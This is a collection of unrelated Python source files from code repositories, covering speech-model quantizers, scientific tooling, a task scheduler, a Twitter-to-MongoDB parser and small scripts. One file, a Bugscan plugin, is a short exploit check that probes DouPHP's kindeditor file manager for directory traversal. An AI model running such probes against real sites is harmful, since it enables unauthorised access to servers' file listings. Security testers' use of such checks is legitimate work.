embedding_3classes = target_norm * self.embedding0_3classes / self.embedding0_3classes.norm(dim=2, keepdim=True)
embedding_4classes = target_norm * self.embedding0_4classes / self.embedding0_4classes.norm(dim=2, keepdim=True)
embedding_nclasses = target_norm * self.embedding0_nclasses / self.embedding0_nclasses.norm(dim=2, keepdim=True)
else:
x = x0
embedding_2classes = self.embedding0_2classes
embedding_3classes = self.embedding0_3classes
embedding_4classes = self.embedding0_4classes
embedding_nclasses = self.embedding0_nclasses
#logger.log(f'std[x] = {x.std()}')
x1 = x.reshape(x.size(0) * x.size(1), x.size(2), 1, x.size(3))
# x1: (N*samples, n_channels, 1, vec_len) numeric tensor
#print("Shape of x1 and embedding: ", x1.shape, embedding.shape)
# Perform chunking to avoid overflowing GPU RAM.
index_chunks_2classes = []
index_chunks_3classes = []
index_chunks_4classes = []
index_chunks_nclasses = []
for x1_chunk in x1.split(chunk_size, dim=0):
#print("Shapes of x1_chunk, embedding_2classes, embedding_3classes and embedding_4classes: ", x1_chunk[:,:,:,:63].shape, embedding_2classes.shape, embedding_3classes.shape, embedding_4classes$
index_chunks_2classes.append((x1_chunk[:, :,:, 0:64] - embedding_2classes).norm(dim=3).argmin(dim=2))
index_chunks_3classes.append((x1_chunk[:, :,:,64:128] - embedding_3classes).norm(dim=3).argmin(dim=2))
index_chunks_4classes.append((x1_chunk[:,:,:,128:192] - embedding_4classes).norm(dim=3).argmin(dim=2))
index_chunks_nclasses.append((x1_chunk[:,:,:,192:256] - embedding_nclasses).norm(dim=3).argmin(dim=2))
index_2classes = torch.cat(index_chunks_2classes, dim=0)
index_3classes = torch.cat(index_chunks_3classes, dim=0)
index_4classes = torch.cat(index_chunks_4classes, dim=0)
index_nclasses = torch.cat(index_chunks_nclasses, dim=0)
# index: (N*samples, n_channels) long tensor
hist_2classes = index_2classes.float().cpu().histc(bins=2, min=-0.5, max=1.5)
hist_3classes = index_3classes.float().cpu().histc(bins=3, min=-0.5, max=2.5)
hist_4classes = index_4classes.float().cpu().histc(bins=4, min=-0.5, max=3.5)
hist_nclasses = index_nclasses.float().cpu().histc(bins=64, min=-0.5, max=3.5)
prob_2classes = hist_2classes.masked_select(hist_2classes > 0) / len(index_2classes)
entropy_2classes = - (prob_2classes * prob_2classes.log()).sum().item()
prob_3classes = hist_3classes.masked_select(hist_3classes > 0) / len(index_3classes)
entropy_3classes = - (prob_3classes * prob_3classes.log()).sum().item()
prob_4classes = hist_4classes.masked_select(hist_4classes > 0) / len(index_4classes)
entropy_4classes = - (prob_4classes * prob_4classes.log()).sum().item()
prob_nclasses = hist_nclasses.masked_select(hist_nclasses > 0) / len(index_nclasses)
entropy_nclasses = - (prob_nclasses * prob_nclasses.log()).sum().item()
index1_2classes = (index_2classes.squeeze(1) + self.offset).cpu().numpy().tolist()
index1_3classes = (index_3classes.squeeze(1) + self.offset).cpu().numpy().tolist()
index1_4classes = (index_4classes.squeeze(1) + self.offset).cpu().numpy().tolist()
index1_nclasses = (index_nclasses.squeeze(1) + self.offset).cpu().numpy().tolist()
latents_2classes = ' '.join(str(k) for k in self.deduplicate(index1_2classes))
latents_3classes = ' '.join(str(k) for k in self.deduplicate(index1_3classes))
latents_4classes = ' '.join(str(k) for k in self.deduplicate(index1_4classes))
latents_nclasses = ' '.join(str(k) for k in self.deduplicate(index1_nclasses))
print("2 Class Latents and entropy: ", latents_2classes, entropy_2classes)
print("3 Class Latents and entropy: ", latents_3classes, entropy_3classes)
print("4 Class Latents and entropy: ", latents_4classes, entropy_4classes)
print("N Class Latents and entropy: ", latents_nclasses, entropy_nclasses)
# Remove repeated entries
def deduplicate(self, arr):
arr_new = []
current_element = None
for element in arr:
if current_element is None:
current_element = element
arr_new.append(element)
elif element == current_element:
continue
else:
current_element = element
arr_new.append(element)
return arr_new
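# --- Illustrative usage sketch (editor's addition); tensor sizes follow the class docstring ---
# The 256-dim latent is treated as four 64-dim groups, each matched against its own
# codebook (2, 3, 4 and 16 entries); forward() returns the straight-through output,
# the two penalty terms and one entropy value per codebook.
def _demo_quantizer_kotha_arff():
    """Illustration only; requires a CUDA device because the offset buffer lives on GPU."""
    quantizer = quantizer_kotha_arff(n_channels=1, n_classes=256, vec_len=64, normalize=True)
    latents = torch.randn(2, 50, 1, 256).cuda()  # (B, T, n_channels, vec_len)
    quantized, vq_penalty, encoder_penalty, e2, e3, e4, en = quantizer(latents)
    assert quantized.shape == latents.shape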
class SILA(nn.Module):
def __init__(self, embedding_dim=256, input_dim=80, r = 4, mel_dim = 80, linear_dim = 1025, use_arff = 0, assistant = None):
super(SILA, self).__init__()
if use_arff:
self.quantizer = quantizer_kotha_arff(n_channels=1, n_classes=256, vec_len=int(embedding_dim/4), normalize=True, assistant = assistant)
else:
self.quantizer = quantizer_kotha(n_channels=1, n_classes=16, vec_len=embedding_dim, normalize=True, assistant = assistant)
encoder_layers = [
(2, 4, 1),
(2, 4, 1),
(2, 4, 1),
(2, 4, 1),
(2, 4, 1),
(1, 4, 1),
(2, 4, 1),
]
self.downsampling_encoder = DownsamplingEncoderStrict(embedding_dim, encoder_layers, input_dim=mel_dim+128, use_batchnorm=1)
#self.decoder = SpecLSTM(input_dim=embedding_dim)
self.embedding_fc = nn.Linear(256, 128)
#self.decoder.upsample_scales = [2,2]
#self.decoder.upsample_network = UpsampleNetwork(self.decoder.upsample_scales)
self.r = r
self.postnet = CBHG(mel_dim, K=8, projections=[256, mel_dim])
self.mel_dim = mel_dim
self.last_linear = nn.Linear(mel_dim * 2, linear_dim)
print("Outputs per step: ", r)
#self.lid_postnet = CBHG(embedding_dim, K=8, projections=[256, embedding_dim])
self.lid_lstm = nn.LSTM(embedding_dim, 128, bidirectional=True, batch_first=True)
self.lid_fc = nn.Linear(128, 2)
self.use_arff = use_arff
def forward(self, mels, embedding):
outputs = {}
B = mels.size(0)
# Add noise to raw audio
mels_noisy = mels * (0.02 * torch.randn(mels.shape).cuda()).exp() + 0.003 * torch.randn_like(mels)
#print("Shape of mels: ", mels.shape)
mels_downsampled = self.downsampling_encoder(mels_noisy)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
#mels = mels.view(B, mels.size(1) // self.r, -1)
#mels_downsampled = mels_downsampled.view(B, mels_downsampled.size(1) // self.r, -1)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
# Get approximate phones
quantized, vq_penalty, encoder_penalty, entropy = self.quantizer(mels_downsampled.unsqueeze(2))
quantized = quantized.squeeze(2)
# Get the LID logits
#mels_lid = self.lid_postnet(quantized.transpose(1,2))
_, (lid_hidden,_) = self.lid_lstm(quantized)
lid_logits = self.lid_fc(lid_hidden[-1])
# Combine inputs
emb = embedding.unsqueeze(1).expand(B, mels_downsampled.shape[1], -1)
emb = torch.tanh(self.embedding_fc(emb))
quantized = torch.cat([quantized, emb], dim=-1)
# Reconstruction
#print("Shapes of quantized and original mels to the deocder: ", quantized.shape, mels.shape)
mel_outputs, alignments = self.decoder(quantized, mels, memory_lengths=None)
#print("Shape of mel outputs: ", mel_outputs.shape)
mel_outputs = mel_outputs.view(B, -1, self.mel_dim)
#print("Shape of mel outputs: ", mel_outputs.shape)
linear_outputs = self.postnet(mel_outputs)
linear_outputs = self.last_linear(linear_outputs)
#print("Shape of linear outputs: ", linear_outputs.shape)
# Return
return mel_outputs, linear_outputs, alignments, lid_logits, vq_penalty.mean(), encoder_penalty.mean(), entropy
def forward_getlid(self, mels, embedding):
B = mels.shape[0]
emb = embedding.unsqueeze(1).expand(B, mels.shape[1], -1)
emb = torch.tanh(self.embedding_fc(emb))
mels_noisy = torch.cat([mels, emb], dim=-1)
#mels_noisy = mels
mels_downsampled = self.downsampling_encoder(mels_noisy)
# Get approximate phones
if self.use_arff:
quantized, vq_penalty, encoder_penalty, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses = self.quantizer(mels_downsampled.unsqueeze(2))
else:
latents, entropy = self.quantizer.get_quantizedindices(mels_downsampled.unsqueeze(2))
quantized, vq_penalty, encoder_penalty, entropy = self.quantizer(mels_downsampled.unsqueeze(2))
quantized = quantized.squeeze(2)
# Combine inputs
#emb = embedding.unsqueeze(1).expand(B, mels_downsampled.shape[1], -1)
#emb = torch.tanh(self.embedding_fc(emb))
#quantized = torch.cat([quantized, emb], dim=-1)
# Get the LID logits
#print("Shape of quantized: ", quantized.shape)
#quantized = self.lid_postnet(quantized)
_, (lid_hidden,_) = self.lid_lstm(quantized)
lid_logits = self.lid_fc(lid_hidden[-1])
if self.use_arff:
return lid_logits, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses
return lid_logits, entropy
def forward_noreconstruction(self, mels, embedding):
outputs = {}
B = mels.size(0)
# Add noise to raw audio
mels_noisy = mels * (0.02 * torch.randn(mels.shape).cuda()).exp() + 0.003 * torch.randn_like(mels)
#mels_noisy = mels_noisy[:,fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b,:]
emb = embedding.unsqueeze(1).expand(B, mels_noisy.shape[1], -1)
emb = torch.tanh(self.embedding_fc(emb))
mels_noisy = torch.cat([mels_noisy, emb], dim=-1)
#print("Shape of mels: ", mels.shape)
mels_downsampled = self.downsampling_encoder(mels_noisy)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
#mels = mels.view(B, mels.size(1) // self.r, -1)
#mels_downsampled = mels_downsampled.view(B, mels_downsampled.size(1) // self.r, -1)
#print("Shape of mels and mels_downsampled: ", mels.shape, mels_downsampled.shape)
# Get approximate phones
if self.use_arff:
quantized, vq_penalty, encoder_penalty, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses = self.quantizer(mels_downsampled.unsqueeze(2))
else:
quantized, vq_penalty, encoder_penalty, entropy = self.quantizer(mels_downsampled.unsqueeze(2))
quantized = quantized.squeeze(2)
# Combine inputs
#emb = embedding.unsqueeze(1).expand(B, mels_downsampled.shape[1], -1)
#emb = torch.tanh(self.embedding_fc(emb))
#quantized = torch.cat([quantized, emb], dim=-1)
# Get the LID logits
#print("Shape of quantized: ", quantized.shape)
#quantized = self.lid_postnet(quantized)
_, (lid_hidden,_) = self.lid_lstm(quantized)
lid_logits = self.lid_fc(lid_hidden[-1])
if self.use_arff:
return lid_logits, vq_penalty.mean(), encoder_penalty.mean(), entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses
return lid_logits, vq_penalty.mean(), encoder_penalty.mean(), entropy
| 2.21875 | 2 |
modules/shapelets/__init__.py | shapelets/shapelets-compute | 14 | 12795657 | <reponame>shapelets/shapelets-compute
# Copyright (c) 2021 Grumpy Cat Software S.L.
#
# This Source Code is licensed under the MIT 2.0 license.
# the terms can be found in LICENSE.md at the root of
# this project, or at http://mozilla.org/MPL/2.0/.
from __future__ import annotations
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
try:
__SHAPELETS_SETUP__
except NameError:
__SHAPELETS_SETUP__ = False
from sys import stderr
if __SHAPELETS_SETUP__:
stderr.write("Running from source directory.\n")
else:
# Normal initialization here
from . import compute
from . import generators
from . import data
from ._cli import *
from . import _cli
__all__ = ["compute", "generators", "data"]
__all__ += _cli.__all__
backends = compute.get_available_backends()
if len(backends) <= 1:
import warnings
if len(backends) == 0:
msg = """
No backends available. Please use shapelets command line tool to
install a new backend. For example: shapelets install cpu
"""
elif backends[0] == 'cpu':
msg = "Only one compute device found: " + repr(backends)
msg += """
Most of the operations won't be accelerated since the only device found is CPU. Consider
adding OpenCL or CUDA support to your environment to benefit from the accelerated versions of the
algorithms this library provides.
"""
warnings.warn(msg, RuntimeWarning)
del backends
del stderr
| 2.234375 | 2 |
solutions/week-3/requests_2.py | bekbolsky/stepik-python | 1 | 12795658 | import requests
base_url = "https://stepic.org/media/attachments/course67/3.6.3/"
with open("solutions/week-3/dataset_3378_3.txt") as f:
first_url = f.readline().strip()
r = requests.get(first_url)
answer = r.text.strip()
count = 1
while not answer.startswith("We"):
r = requests.get(f"{base_url}{answer}")
answer = r.text.strip()
count += 1
print(f"Requesting next file with answer. Requested: {count}")
else:
final_answer = answer
print(final_answer)
| 3.1875 | 3 |
nf_core/lint/actions_awsfulltest.py | aunderwo/tools | 0 | 12795659 | <filename>nf_core/lint/actions_awsfulltest.py<gh_stars>0
#!/usr/bin/env python
import os
import yaml
def actions_awsfulltest(self):
"""Checks the GitHub Actions awsfulltest is valid.
In addition to small test datasets run on GitHub Actions, we provide the possibility of testing the pipeline on full size datasets on AWS.
This should ensure that the pipeline runs as expected on AWS and provide a resource estimation.
The GitHub Actions workflow is called ``awsfulltest.yml``, and it can be found in the ``.github/workflows/`` directory.
.. warning:: This workflow incurs AWS costs, therefore it should only be triggered for pipeline releases:
``workflow_run`` (after the docker hub release workflow) and ``workflow_dispatch``.
.. note:: You can manually trigger the AWS tests by going to the `Actions` tab on the pipeline GitHub repository and selecting the
`nf-core AWS full size tests` workflow on the left.
.. tip:: For tests on full data prior to release, `Nextflow Tower <https://tower.nf>`_ launch feature can be employed.
The ``.github/workflows/awsfulltest.yml`` file is tested for the following:
* Must be turned on ``workflow_dispatch``.
* Must be turned on for ``workflow_run`` with ``workflows: ["nf-core Docker push (release)"]`` and ``types: [completed]``
* Should run the profile ``test_full`` that should be edited to provide the links to full-size datasets. If it runs the profile ``test``, a warning is given.
"""
passed = []
warned = []
failed = []
fn = os.path.join(self.wf_path, ".github", "workflows", "awsfulltest.yml")
if os.path.isfile(fn):
try:
with open(fn, "r") as fh:
wf = yaml.safe_load(fh)
except Exception as e:
return {"failed": ["Could not parse yaml file: {}, {}".format(fn, e)]}
aws_profile = "-profile test "
# Check that the action is only turned on for published releases
try:
assert "workflow_run" in wf[True]
assert wf[True]["workflow_run"]["workflows"] == ["nf-core Docker push (release)"]
assert wf[True]["workflow_run"]["types"] == ["completed"]
assert "workflow_dispatch" in wf[True]
except (AssertionError, KeyError, TypeError):
failed.append("`.github/workflows/awsfulltest.yml` is not triggered correctly")
else:
passed.append("`.github/workflows/awsfulltest.yml` is triggered correctly")
# Warn if `-profile test` is still unchanged
try:
steps = wf["jobs"]["run-awstest"]["steps"]
assert any([aws_profile in step["run"] for step in steps if "run" in step.keys()])
except (AssertionError, KeyError, TypeError):
passed.append("`.github/workflows/awsfulltest.yml` does not use `-profile test`")
else:
warned.append("`.github/workflows/awsfulltest.yml` should test full datasets, not `-profile test`")
return {"passed": passed, "warned": warned, "failed": failed}
| 2.203125 | 2 |
compiler_gym/util/commands.py | thecoblack/CompilerGym | 0 | 12795660 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import subprocess
import sys
from contextlib import contextmanager
from signal import Signals
from subprocess import Popen as _Popen
from typing import List
def run_command(cmd: List[str], timeout: int):
with Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
) as process:
stdout, stderr = process.communicate(timeout=timeout)
if process.returncode:
returncode = process.returncode
try:
# Try and decode the name of a signal. Signal returncodes
# are negative.
returncode = f"{returncode} ({Signals(abs(returncode)).name})"
except ValueError:
pass
raise OSError(
f"Compilation job failed with returncode {returncode}\n"
f"Command: {' '.join(cmd)}\n"
f"Stderr: {stderr.strip()}"
)
return stdout
def communicate(process, input=None, timeout=None):
"""subprocess.communicate() which kills subprocess on timeout."""
try:
return process.communicate(input=input, timeout=timeout)
except subprocess.TimeoutExpired:
# kill() was added in Python 3.7.
if sys.version_info >= (3, 7, 0):
process.kill()
else:
process.terminate()
# Wait for shutdown to complete.
try:
process.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
pass # Stubborn process won't die, nothing can be done.
raise
@contextmanager
def Popen(*args, **kwargs):
"""subprocess.Popen() with resilient process termination at end of scope."""
with _Popen(*args, **kwargs) as process:
try:
yield process
finally:
# Process has not yet terminated, kill it.
if process.poll() is None:
# kill() was added in Python 3.7.
if sys.version_info >= (3, 7, 0):
process.kill()
else:
process.terminate()
# Wait for shutdown to complete.
try:
process.communicate(timeout=60)
except subprocess.TimeoutExpired:
pass # Stubborn process won't die, nothing can be done.
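# --- Illustrative usage sketch (editor's addition); assumes a Unix-like system ---
# run_command() raises OSError with the decoded signal name when the child fails, and
# Popen() guarantees the child is killed if the enclosing block exits early.
def _demo_commands():
    """Illustration only; never called by the module."""
    assert run_command(["echo", "hello"], timeout=10).strip() == "hello"
    with Popen(["sleep", "60"]) as proc:
        assert proc.poll() is None  # still running; terminated automatically on exit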
| 2.453125 | 2 |
storm_scheduler/task.py | eandersson/storm.scheduler | 0 | 12795661 | <filename>storm_scheduler/task.py
import logging
import time
from typing import Callable
import storm_scheduler
from storm_scheduler import exception
LOG = logging.getLogger(__name__)
class Task:
def __init__(self, func, *args, **kwargs):
if not isinstance(func, Callable):
raise exception.TaskError('Task function needs to be callable')
self._func = func
self._args = args
self._kwargs = kwargs
self._interval = None
self._next_run = None
self.last_runtime = None
def __str__(self):
if not self._interval:
return f'<Task: {self._func.__name__} not yet scheduled to run>'
return f'<Task: {self._func.__name__} scheduled to run every {self._interval}s>'
def every(self, value, unit='seconds'):
"""Run a task every X units! (e.g. every 30 seconds)
:param int,float value: Interval
:param str unit: Time unit (e.g. seconds, minutes, hours, days)
:raises TaskError: This is raised when there is an issue with the Task.
"""
if not isinstance(value, (int, float)):
raise exception.TaskError('Task interval needs to be an integer or float')
elif value <= 0:
raise exception.TaskError('Interval cannot be zero or negative')
elif unit not in storm_scheduler.ALLOWED_TIME_UNITS:
raise exception.TaskError(f"Unit '{unit}' not in the list of supported time units")
unit = str(unit).lower()
        seconds = value
        if unit == storm_scheduler.MINUTES:
            seconds = value * 60
        elif unit == storm_scheduler.HOURS:
            seconds = value * 60 * 60
        elif unit == storm_scheduler.DAYS:
            seconds = value * 60 * 60 * 24
self._interval = seconds
self._next_run = time.monotonic() + self._interval
return self
def run(self):
"""Execute the Task."""
start_time = time.monotonic()
try:
self._func(*self._args, **self._kwargs)
except exception.TaskError as why:
LOG.warning(f'Task Error: {why}')
finally:
self.last_runtime = time.monotonic() - start_time
interval = max(self._interval - self.last_runtime, 0.01)
self._next_run = time.monotonic() + interval
@property
def should_run(self):
"""Are we ready to run again?"""
return self.next_run <= 0
@property
def next_run(self):
"""Time remaining until next run."""
return self._next_run - time.monotonic()
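# --- Illustrative usage sketch (editor's addition); the heartbeat callable is hypothetical ---
# A Task wraps a callable and its arguments; every() sets the interval, and run()
# re-schedules the next execution based on how long the call actually took.
def _demo_task():
    """Illustration only; never called by the module."""
    def heartbeat(name):
        LOG.info('ping from %s', name)

    task = Task(heartbeat, 'worker-1').every(30, unit='seconds')
    if task.should_run:
        task.run()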
| 3.015625 | 3 |
src/twitter_parser_mongo.py | alikhanlab/Building-Big-Data-Infrastucture-using-NoSQL-and-SQL | 0 | 12795662 | # Twitter Parser
# Parses Data and uploads to MongoDB
import twitter_access
import mongo_access
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import json
import re
import tweepy
import time
from datetime import datetime
from dateutil.parser import parse
from pymongo import MongoClient
import os
import psycopg2
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import pandas as pd
# Connect to MongoDB
client_mongo = MongoClient(mongo_access.URL)
db_mongo = client_mongo.get_database("alikhanlab-twitter")
tweets_mongo = db_mongo.tweets
# Twitter Parser Class
class Output_Listener(StreamListener):
def __init__(self, sec_limit, track):
self.start_time = time.time()
self.sec_limit = sec_limit
self.track = track
self.analyser = SentimentIntensityAnalyzer()
self.cities = pd.read_excel('CitiesEnriched.xls')
def on_data(self, data):
def clean_tweet(x):
x = x.encode('ascii', 'ignore').decode('ascii')
x = re.sub(r'http\S+', '', x)
return x
if (time.time() - self.start_time) < self.sec_limit:
tweet = json.loads(data)
if tweet["retweeted"] == False:
created_at = parse(tweet["created_at"])
tweet_id_str = tweet["id_str"]
text = clean_tweet(tweet["text"])
retweet_count = tweet["retweet_count"]
favorite_count = tweet["favorite_count"]
user_id = tweet["user"]["id_str"]
user_followers_count = tweet["user"]["followers_count"]
# text sentiment
tweet_sentiment = self.analyser.polarity_scores(text)
# user geolocation
city = self.cities.sample()
longitude = city['Lng'].values[0]
latitude = city['Lat'].values[0]
obj = {"track":self.track[0],"created_at":created_at,"tweet_id_str":tweet_id_str,"text":text,
"neg_score":tweet_sentiment["neg"],
"neu_score":tweet_sentiment["neu"],
"pos_score":tweet_sentiment["pos"],
"retweet_count":retweet_count,
"favorite_count":favorite_count, "user_id":user_id, "user_followers_count":user_followers_count,
"user_long": longitude, "user_lat":latitude}
tweets_mongo.insert_one(obj)
print('Tweet is uploaded on MongoDB')
return True
else:
print('End parsing.....')
print('Time limit is reached')
return False
def on_error(self, status):
print(status)
def parse_and_populate(sec_limit, track):
listener = Output_Listener(sec_limit, track)
auth = OAuthHandler(twitter_access.API_KEY, twitter_access.API_SECRET_KEY)
auth.set_access_token(twitter_access.ACCESS_TOKEN, twitter_access.ACCESS_TOKEN_SECRET)
stream = Stream(auth, listener)
stream.filter(languages = ['en'], track = track)
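# --- Illustrative usage sketch (editor's addition); the keyword and time limit are hypothetical ---
# parse_and_populate() streams English tweets matching `track` for `sec_limit` seconds,
# scores each with VADER, attaches a sampled city location and inserts it into MongoDB.
def _demo_parse_and_populate():
    """Illustration only; needs valid twitter_access / mongo_access credentials."""
    parse_and_populate(sec_limit=60, track=['bigdata'])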
| 2.796875 | 3 |
image_trasnformations/__init__.py | Mauricio-xxi/image_transformations | 0 | 12795663 | <reponame>Mauricio-xxi/image_transformations<filename>image_trasnformations/__init__.py
from hello import say_hello
| 1.109375 | 1 |
setup.py | scls19fr/pandas-helper-calc | 7 | 12795664 | from setuptools import setup
setup(
name="pandas_helper_calc",
version="0.0.1",
packages=["pandas_helper_calc"],
license="MIT License",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
)
| 1.320313 | 1 |
libs/models/__init__.py | taesung89/deeplab-pytorch | 1 | 12795665 | <reponame>taesung89/deeplab-pytorch<filename>libs/models/__init__.py
from libs.models.resnet import *
from libs.models.deeplabv2 import *
from libs.models.deeplabv3 import *
from libs.models.deeplabv3plus import *
from libs.models.msc import *
def init_weights(model):
for m in model.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal(m.weight)
if m.bias is not None:
nn.init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.kaiming_normal(m.weight)
if m.bias is not None:
nn.init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant(m.weight, 1)
if m.bias is not None:
                nn.init.constant(m.bias, 0)
def DeepLabV2_ResNet101_MSC(n_classes):
return MSC(DeepLabV2(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[6, 12, 18, 24]))
def DeepLabV2S_ResNet101_MSC(n_classes):
return MSC(DeepLabV2(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[3, 6, 9, 12]))
def DeepLabV3_ResNet101_MSC(n_classes):
return MSC(DeepLabV3(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[6, 12, 18]))
def DeepLabV3Plus_ResNet101_MSC(n_classes):
return MSC(DeepLabV3Plus(n_classes=n_classes, n_blocks=[3, 4, 23, 3], pyramids=[6, 12, 18])) | 2.484375 | 2 |
nifi_cluster_coordinator/utils/url_helper.py | plexsystems/nifi-cluster-coordinator | 7 | 12795666 | import urllib.parse as urlparse
from typing import List, Dict
def construct_path_parts(parts: List[str]) -> str:
"""Return a string separated by '/' for a url path."""
if isinstance(parts, list):
return '/'.join(parts)
elif parts is None:
return ''
else:
return parts
def construct_query_parts(parts: Dict[str, str]) -> str:
"""Return a query string constrcuted from key value pairs"""
if isinstance(parts, dict):
return '&'.join(x + '=' + y for x, y in parts.items())
else:
return parts
def construct_api_url(scheme: str,
host_name: str,
path_parts: List[str] = None,
query_parts: Dict[str, str] = None) -> str:
return urlparse.urlunsplit((
scheme,
host_name,
construct_path_parts(path_parts),
construct_query_parts(query_parts),
None
))
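# --- Illustrative usage sketch (editor's addition); the host and path values are hypothetical ---
def _demo_construct_api_url():
    """Illustration only; never called by the module."""
    url = construct_api_url(
        'https', 'nifi.example.com',
        path_parts=['nifi-api', 'flow', 'process-groups', 'root'],
        query_parts={'recursive': 'true'},
    )
    assert url == 'https://nifi.example.com/nifi-api/flow/process-groups/root?recursive=true'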
| 3.296875 | 3 |
src/Current Models/Two Space/fermat_sprial.py | PharaohCola13/Geotesimal | 3 | 12795667 | <gh_stars>1-10
import matplotlib.pyplot as plt
from matplotlib import *
from numpy import *
from matplotlib.animation import *
name = "<NAME>"
def shape(fig, edge_c, edge_w, grid, radiusm, figcolor):
plt.clf()
def r_(u):
r = a * sqrt(u)
return r
a = radiusm
u = linspace(0, 10 * pi,1000)
r = r_(u)
ax = plt.subplot(111, projection='polar')
# ax.patch.set_facecolor(figcolor)
ax.xaxis.set_tick_params(color="white", labelcolor="white")
ax.yaxis.set_tick_params(color="white", labelcolor="white")
plt.axis(grid)
plt.plot(u, r, color=edge_c, linewidth=edge_w)
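# --- Illustrative usage sketch (editor's addition); argument values are hypothetical ---
# Fermat's spiral is r = a * sqrt(theta); shape() draws it on a polar axis with the given
# edge colour/width, grid toggle ('on'/'off') and scale factor a = radiusm.
def _demo_shape():
    """Illustration only; never called by the module."""
    fig = plt.figure()
    shape(fig, edge_c="crimson", edge_w=1.5, grid="on", radiusm=1.0, figcolor="black")
    plt.show()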
| 2.953125 | 3 |
Bugscan_exploits-master/exp_list/exp-434.py | csadsl/poc_exp | 11 | 12795668 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'
#ref http://www.wooyun.org/bugs/wooyun-2010-076974
def assign(service, arg):
if service == "douphp":
return True, arg
def audit(arg):
url = arg + "admin/include/kindeditor/php/file_manager_json.php?path=/&dir=image"
code, head, res, errcode,finalurl = curl.curl(url)
if res.find("total_count") != -1 and res.find("file_list") != -1:
security_warning('find Directory traversal:' + url)
if __name__ == '__main__':
from dummy import *
audit(assign('douphp', 'http://1172.16.31.10/douphp/')[1]) | 1.992188 | 2 |
python101/Count_Extract_xml_attribute.py | geraudazangue/Python_Projects | 0 | 12795669 | # -*- coding: utf-8 -*-
"""
Created on Sat May 18 23:47:15 2019
@author: <NAME>
"""
import glob
import os
import os.path
from pathlib import Path
from lxml import etree
import pandas as pd
from datetime import datetime
import logging
import time
start_time = time.time()
logging.basicConfig(filename='app.log', filemode='w', level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
count2=0
value = []
try:
#######Solution 1###############
for p in Path('C:/RTC/Scripts & Tools & Files/Python/COUNT SKU PY').glob('**/*.xml'):
if p.is_file():
xml = etree.parse(str(p))
count = len(xml.findall(".//*[A0001]"))
print(count)
for nb in xml.findall('.//PRODUCT'):
s_sku = nb.find("A0001").text
value.append(s_sku)
count2 = count + count2
logging.info('%s Nb item', count2)
print(count2)
#######SOLUTION 2###############
test_list = [etree.parse(str(p)) for p in Path('C:/RTC/Scripts & Tools & Files/Python/COUNT SKU PY').glob('**/*.xml')
if p.is_file()]
def find_sku(xml):
list_find_all_sku = [sku_tree for sku_tree in xml.findall('.//PRODUCT')]
sku_value_list = [sku.find("A0001").text for sku in list_find_all_sku]
return(sku_value_list)
value2 = list(chain.from_iterable(find_sku(total) for total in test_list))
print(len(value2))
d = {'SKU':value}
df = pd.DataFrame(d)
datestring = datetime.strftime(datetime.now(), ' %Y%m%d_%H%M%S')
export_excel = df.to_excel (fr'C:/RTC/Scripts & Tools & Files/Python/COUNT SKU PY/export_NB_SKU_{datestring}.xlsx', index = None, header=True)
except Exception as e:
logging.exception("Exception occurred")
End_time =time.time()
Execution_time = End_time - start_time
print(f"{Execution_time},secs")
| 2.390625 | 2 |
python/iviz/Data/Float.py | eddy-ilg/iviz | 0 | 12795670 | <filename>python/iviz/Data/Float.py
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import ikit.io
from ..Util import toQPixmap
import numpy as np
from ikit.dataops import heat_map_viz
from ikit import read
import os
import math
from copy import copy
from ._Base import _Base
from .VizItem import VizItem
def colors(n):
ret = []
r = int(0.5 * 256)
g = int(0.5 * 256)
b = int(0.5 * 256)
step = 256 / n
for i in range(n):
r += step
g += step
b += step
r = int(r) % 256
g = int(g) % 256
b = int(b) % 256
ret.append((r,g,b))
return ret
def labelViz(data, min, max):
from scipy import ndimage
from skimage.color import label2rgb
bins = [min]
off = min
while True:
off = math.ceil(off) + 0.5
if off>=max:
bins.append(max+0.000001)
break
bins.append(off)
digitized = np.digitize(data, bins=bins)
color_labeled = label2rgb(digitized, bg_label=0)
return (color_labeled*255).astype(np.uint8)
class Float(_Base):
def __init__(self, data=None, range = (0.0, 1.0), marks=None):
super().__init__(marks)
self._vizType = 'grayscale'
self._range = range
self._offset = (0, 0)
self._plotAxes = (0, 1)
self._offsetAxes = (2, 3)
self._dims = None
self.setTo(data)
def setTo(self, data):
if isinstance(data, str):
self._tryReadMarks(data)
if os.path.exists(data): data = read(data)
else: data = None
elif isinstance(data, VizItem):
self._marks = data.marks
data = data.data
if data is not None: data = np.squeeze(data)
if data is not None: self._dims = len(data.shape)
else: self._dims = 0
if data is not None and len(data.shape) == 0:
data = np.expand_dims(data, axis=0)
data = np.expand_dims(data, axis=1)
data = np.expand_dims(data, axis=2)
data = np.expand_dims(data, axis=3)
if data is not None and len(data.shape) == 1:
data = np.expand_dims(data, axis=1)
data = np.expand_dims(data, axis=2)
data = np.expand_dims(data, axis=3)
if data is not None and len(data.shape) == 2:
data = np.expand_dims(data, axis=2)
data = np.expand_dims(data, axis=3)
elif data is not None and len(data.shape) == 3:
data = np.expand_dims(data, axis=3)
self._data = data
def dims(self): return self._dims
    def offsetDims(self): return max(0, self._dims - 2)
